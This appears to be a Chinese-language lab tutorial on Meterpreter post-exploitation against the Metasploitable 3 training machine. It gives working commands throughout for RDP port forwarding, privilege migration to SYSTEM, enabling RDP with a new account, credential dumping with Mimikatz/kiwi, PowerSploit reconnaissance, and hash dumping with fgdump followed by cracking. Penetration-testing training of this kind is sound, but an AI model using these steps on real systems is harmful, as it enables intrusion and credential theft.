Day26 - 针对 Metasploitable 3 进行渗透测试(7) - 利用 Meterpreter 後渗透

何谓後渗透

当恶意攻击者入侵企业之後，会从第一台入口点开始往内部进行攻击，有些企业会使用 Windows AD 进行权限控管，因此线在对於 Windwos AD 的安全性也很重要。

演练情境

接续昨天的情境，第一台入口机器被植入 Meterpreter 後门之後，可以用那些指令进行後渗透。

1. use post/multi/manage/shell_to_meterpreter
   设定工具
2. set session 1
   设定 session
   
3. run
   执行升级 shell
   

实验期间有可能会有 shell 不稳的状态，多尝试几次!

转发端口

当受害主机可能开启了 RDP (远端桌面)但因为防火墙阻挡或其他原因，导致无法连到受害主机，因此可以将受害主机的 port 转发到攻击主机，直接存取攻击主机的转发过来的 port 就可以连接到受害主机的 port，我们透过指令 portfwd 进行测试。

转发指定端口
portfwd add -l 3389 -p 3389 -r [target]

确认目前已经转发的 port
portfwd list

确认攻击主机是否有监听 3389
netstat -antup

安装 rdesktop
sudo apt install rdesktop

进行本地连线
rdesktop 127.0.0.1:3389

主要连线连到本机(127.0.0.1)的 3389 port，但因为 port 已经转发到受害主机的 3389，因此连线画面其实是受害主机的连线画面。

删除转发的 port
portfwd delete -l 3389 -p 3389 -r [target]

一次删除所有 portfwd
portfwd flush

後渗透:开启远端桌面

1. 先跳转到管理者权限，利用 ps 查看目前有管理者权限的 process
   ps
   
2. 锁定 PID 484 利用 migrate <PID> 合并，可以用 getuid 确认
   
3. 输入background，并且查看 sessions 确认自己已经提权到 SYSTEM
   
4. 使用
   use post/windows/mange/enable_rdp

5. 设定参数
set username feifei
set password feitest
set session 1
run

6. 可以利用之前 portfwd 的方式，RDP 登入

Mimikatz

load mimikatz
因为现在 mimikatz 已经合并，因此直接使用 load kiwi

查看所有帐号密码
creds_all

查看所有 kerberos 密码
creds_kerberos

查看所有 msv 密码
creds_msv

查看所有 wdigest 密码
creds_wdigest

查看版本
kiwi_cmd version

使用 mimikatz 的指令
kiwi_cmd <mimikatz模组>

kiwi_cmd ::
查看 mimikatz 的模组

查看 sekurlsa 模组
kiwi_cmd sekurlsa::

使用 sekurlsa 中的 msv 指令
kiwi_cmd sekurlsa::msv

powershell

load powershell

1. powershell_execute 执行 powershell 指令
2. powershell_import 引用其他工具
3. powershell_shell 直接进行互动

powershell_execute "$PSVersionTable"

下载後渗透工具
git clone https://github.com/PowerShellMafia/PowerSploit

确认我们需要的工具

** import 指定工具**
将工具 load 进去
powershell_import "/home/user/PowerSploit/Recon/PowerView.ps1"

powershell_execute Get-NetLoggedon

可直接使用 powershell 互动
powershell_shell
$PSVersionTable

hashdump

hashdump

fgdump.exe

档案：https://github.com/interference-security/kali-windows-binaries/blob/master/fgdump/fgdump.exe

将这个 exe 下载到家目录。

上传 fgdump.exe 到受害主机
upload /home/user/fgdump.exe C:\\

进入 shell 模式
shell

切换到 C
cd ..
cd ..

执行 fgdump.exe
fgdump.exe

确认档案名称
dir
127.0.0.1pwdump

查看 hash
type 127.0.0.1pwdump

下载指定档案
download 127.0.0.1pwdump

使用 rockyou 字典档爆破密码